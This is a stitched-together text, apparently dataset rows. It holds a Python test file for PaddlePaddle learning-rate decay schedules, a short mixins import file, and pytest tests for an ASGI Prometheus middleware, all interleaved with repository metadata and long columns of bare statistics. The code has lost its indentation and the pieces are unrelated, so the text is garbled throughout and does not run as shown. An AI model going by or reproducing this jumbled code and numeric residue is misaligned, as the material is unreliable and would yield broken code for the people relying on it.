exp = []
for i in range(9):
tmp = 1 * math.exp(-0.5 * math.floor((i + 2) / 3))
exp.append(tmp)
tools.compare(res, exp)
# decay_rate = 0.5 begin = 2 step = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NaturalExpDecay(
learning_rate=1,
decay_steps=3,
decay_rate=0.5,
begin=2,
step=2,
staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
tmp = 1 * math.exp(-0.5 * math.floor((i * 2 + 2) / 3))
exp.append(tmp)
tools.compare(res, exp)
def test_PolynomialDecay():
"""
test PolynomialDecay (polynomial decay learning rate)
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
label.stop_gradient = True
# basic test
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=1,
decay_steps=5,
end_learning_rate=0,
power=1.0, ),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
i = min(i, 5)
tmp = (1 - 0) * (1 - i / 5)**1.0 + 0
exp.append(tmp)
tools.compare(res, exp)
# power = 2.0
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=1,
decay_steps=5,
end_learning_rate=0,
power=2.0, ),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
i = min(i, 5)
tmp = (1 - 0) * (1 - i / 5)**2.0 + 0
exp.append(tmp)
tools.compare(res, exp)
# decay_steps = 3.0
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=1,
decay_steps=3,
end_learning_rate=0,
power=1.0, ),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
i = min(i, 3)
tmp = (1 - 0) * (1 - i / 3)**1.0 + 0
exp.append(tmp)
tools.compare(res, exp)
# end_learning_rate = 0.5
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=1,
decay_steps=7,
end_learning_rate=0.5,
power=1.0, ),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
i = min(i, 7)
tmp = (1 - 0.5) * (1 - i / 7)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
# learning_rate = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=2,
decay_steps=7,
end_learning_rate=0.5,
power=1.0, ),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
i = min(i, 7)
tmp = (2 - 0.5) * (1 - i / 7)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
# learning_rate = 2 begin =1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=2,
decay_steps=7,
end_learning_rate=0.5,
begin=1,
power=1.0),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
i = min(i + 1, 7)
tmp = (2 - 0.5) * (1 - i / 7)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
# learning_rate = 2 begin =1 step = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=2,
decay_steps=7,
end_learning_rate=0.5,
begin=1,
step=2,
power=1.0),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
i = min(i * 2 + 1, 7)
tmp = (2 - 0.5) * (1 - i / 7)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
# cycle = True
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=2,
decay_steps=7,
end_learning_rate=0.5,
power=1.0,
cycle=True),
parameter_list=fc.parameters())
for step in range(20):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(20):
lr = math.ceil(i / 7)
if lr == 0:
lr = 1
tmp = 7 * lr
tmp = (2 - 0.5) * (1 - i / tmp)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
# cycle = True begin = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=2,
decay_steps=7,
end_learning_rate=0.5,
power=1.0,
begin=2,
cycle=True),
parameter_list=fc.parameters())
for step in range(20):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(20):
lr = math.ceil((i + 2) / 7)
if lr == 0:
lr = 1
tmp = 7 * lr
tmp = (2 - 0.5) * (1 - (i + 2) / tmp)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
# cycle = True begin = 2 step = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=2,
decay_steps=7,
end_learning_rate=0.5,
power=1.0,
begin=2,
step=2,
cycle=True),
parameter_list=fc.parameters())
for step in range(20):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(20):
lr = math.ceil((i * 2 + 2) / 7)
if lr == 0:
lr = 1
tmp = 7 * lr
tmp = (2 - 0.5) * (1 - (i * 2 + 2) / tmp)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
def test_NoamDecay():
"""
test NoamDecay (Noam learning rate decay)
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
label.stop_gradient = True
# basic test
d_model = 2
warmup_steps = 2
begin = 1
step = 1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NoamDecay(
d_model=d_model,
warmup_steps=warmup_steps,
begin=begin,
step=step),
parameter_list=fc.parameters())
for i in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
lr = np.power(d_model, -0.5) * np.min([
np.power((i * step + begin), -0.5),
np.power(warmup_steps, -1.5) * (i * step + begin)
])
exp.append(lr)
tools.compare(res, exp)
# d_model = 5
d_model = 5
warmup_steps = 2
begin = 1
step = 1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NoamDecay(
d_model=d_model,
warmup_steps=warmup_steps,
begin=begin,
step=step),
parameter_list=fc.parameters())
for i in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
lr = np.power(d_model, -0.5) * np.min([
np.power((i * step + begin), -0.5),
np.power(warmup_steps, -1.5) * (i * step + begin)
])
exp.append(lr)
tools.compare(res, exp)
# d_model = 5 warmup_steps = 1
d_model = 5
warmup_steps = 1
begin = 1
step = 1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NoamDecay(
d_model=d_model,
warmup_steps=warmup_steps,
begin=begin,
step=step),
parameter_list=fc.parameters())
for i in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
lr = np.power(d_model, -0.5) * np.min([
np.power((i * step + begin), -0.5),
np.power(warmup_steps, -1.5) * (i * step + begin)
])
exp.append(lr)
tools.compare(res, exp)
# d_model = 5 warmup_steps = 5
d_model = 5
warmup_steps = 5
begin = 3
step = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NoamDecay(
d_model=d_model,
warmup_steps=warmup_steps,
begin=begin,
step=step),
parameter_list=fc.parameters())
for i in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
lr = np.power(d_model, -0.5) * np.min([
np.power((i * step + begin), -0.5),
np.power(warmup_steps, -1.5) * (i * step + begin)
])
exp.append(lr)
tools.compare(res, exp)
# d_model = 5 warmup_steps = 5 begin = 3 step = 2
d_model = 5
warmup_steps = 5
begin = 1
step = 1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NoamDecay(
d_model=d_model,
warmup_steps=warmup_steps,
begin=begin,
step=step),
parameter_list=fc.parameters())
for i in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
lr = np.power(d_model, -0.5) * np.min([
np.power((i * step + begin), -0.5),
np.power(warmup_steps, -1.5) * (i * step + begin)
])
exp.append(lr)
tools.compare(res, exp)
| 37.121714
| 103
| 0.531896
| 4,654
| 38,124
| 4.220885
| 0.044908
| 0.071472
| 0.009367
| 0.013134
| 0.935247
| 0.932855
| 0.922317
| 0.919925
| 0.91967
| 0.915699
| 0
| 0.054221
| 0.347891
| 38,124
| 1,026
| 104
| 37.157895
| 0.735932
| 0.051175
| 0
| 0.923777
| 0
| 0
| 0.009538
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007964
| false
| 0
| 0.004551
| 0
| 0.012514
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 7 |
357f5b0a935d4a8d19fcf832d6a3cca351e58e39 | 96 | py | Python | src/ur_fabrication_control/direct_control/mixins/__init__.py | augmentedfabricationlab/ur_fabrication_control | e2af04e3ad7bba0ad5131844e4ccab2e2a4a1663 | ["MIT"] | 5 | 2021-08-12T07:20:02.000Z | 2022-02-26T02:48:32.000Z
| src/ur_fabrication_control/direct_control/mixins/__init__.py | augmentedfabricationlab/ur_fabrication_control | e2af04e3ad7bba0ad5131844e4ccab2e2a4a1663 | ["MIT"] | 7 | 2021-01-20T16:31:21.000Z | 2021-01-21T15:36:45.000Z
| src/ur_fabrication_control/direct_control/mixins/__init__.py | augmentedfabricationlab/ur_fabrication_control | e2af04e3ad7bba0ad5131844e4ccab2e2a4a1663 | ["MIT"] | 2 | 2020-11-19T14:26:41.000Z | 2020-12-11T13:32:55.000Z
|
from .airpick_mixins import *
from .areagrip_mixins import *
from .parallelgrip_mixins import *
| 24
| 34
| 0.8125
| 12
| 96
| 6.25
| 0.5
| 0.48
| 0.426667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 96
| 3
| 35
| 32
| 0.892857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0 | 7 |
358b65f8d4f33382ed4f39353971ee6aa0e4b20e | 2,541 | py | Python | tests.py | klen/asgi-prometheus | c5ed505fd2a6e8f35a2f5d5f146715858e417385 | ["MIT"] | 4 | 2021-04-09T20:18:41.000Z | 2021-05-01T19:43:53.000Z
| tests.py | klen/asgi-prometheus | c5ed505fd2a6e8f35a2f5d5f146715858e417385 | ["MIT"] | 1 | 2021-04-09T18:01:32.000Z | 2021-04-12T07:59:10.000Z
| tests.py | klen/asgi-prometheus | c5ed505fd2a6e8f35a2f5d5f146715858e417385 | ["MIT"] | null | null | null |
from asgi_tools.tests import ASGITestClient
from asgi_tools.app import App
async def test_base():
from asgi_prometheus import PrometheusMiddleware
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.body", "body": b"OK", "more_body": False})
app = PrometheusMiddleware(app, metrics_url='/metrics')
client = ASGITestClient(app)
res = await client.get('/')
assert res.status_code == 200
assert await res.text() == 'OK'
res = await client.get('/metrics')
assert res.status_code == 200
text = await res.text()
assert text
assert 'requests_count_total' in text
assert 'requests_time' in text
async def test_group_path():
from asgi_prometheus import PrometheusMiddleware
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.body", "body": b"OK", "more_body": False})
app = PrometheusMiddleware(app, group_paths={'/api', '/api/v1/users'})
client = ASGITestClient(app)
res = await client.get('/')
assert res.status_code == 200
assert await res.text() == 'OK'
res = await client.get('/api/v1/users')
assert res.status_code == 200
res = await client.get('/api/v1/messages')
assert res.status_code == 200
res = await client.get('/unknown')
assert res.status_code == 200
res = await client.get('/prometheus')
assert res.status_code == 200
text = await res.text()
assert 'requests_count_total{method="GET",path="/api*"}' in text
assert 'requests_count_total{method="GET",path="/api/v1/users*"}' in text
async def test_asgi_tools_internal():
from asgi_prometheus import PrometheusMiddleware
app = App()
app.middleware(PrometheusMiddleware)
client = ASGITestClient(app)
res = await client.get('/')
assert res.status_code == 404
res = await client.get('/prometheus')
assert res.status_code == 200
text = await res.text()
assert text
assert 'requests_count_total' in text
async def test_asgi_tools_external():
from asgi_prometheus import PrometheusMiddleware
app = App()
app = PrometheusMiddleware(app)
client = ASGITestClient(app)
res = await client.get('/')
assert res.status_code == 404
res = await client.get('/prometheus')
assert res.status_code == 200
text = await res.text()
assert text
assert 'requests_count_total' in text
| 28.550562
| 85
| 0.670209
| 329
| 2,541
| 5.051672
| 0.164134
| 0.052948
| 0.092659
| 0.112515
| 0.848977
| 0.838147
| 0.83213
| 0.803249
| 0.739471
| 0.632371
| 0
| 0.021214
| 0.202283
| 2,541
| 88
| 86
| 28.875
| 0.798717
| 0
| 0
| 0.730159
| 0
| 0
| 0.164896
| 0.040535
| 0
| 0
| 0
| 0
| 0.349206
| 1
| 0
| false
| 0
| 0.095238
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 7 |